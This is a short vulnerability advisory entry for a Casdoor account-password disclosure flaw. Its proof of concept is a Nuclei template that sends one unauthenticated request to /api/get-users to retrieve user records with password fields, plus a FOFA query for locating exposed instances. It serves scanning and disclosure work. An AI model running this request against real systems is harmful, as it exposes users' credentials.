漏洞描述
Casdoor get-users Account Password is exposed.
casdoor-users-password: Casdoor get-users Account Password Disclosure
PoC代码[已公开]
id: casdoor-users-password
info:
name: Casdoor get-users Account Password Disclosure
author: DhiyaneshDk
severity: high
description: Casdoor get-users Account Password is exposed.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
classification:
cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: casbin
product: casdoor
fofa-query: title="Casdoor"
tags: casdoor,exposure,misconfig,disclosure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/get-users?p=123&pageSize=123"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"name":'
- '"password":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502203d8b9fb52fe38baebdae7258ed6be539f3dac56e8709226975752fee5b2881ee022100e87951372a580917957129fd0ce0dcda8304ef9b5382c28dd6b72dfc60f8f41b:922c64590222798bb761d5b6d8e72950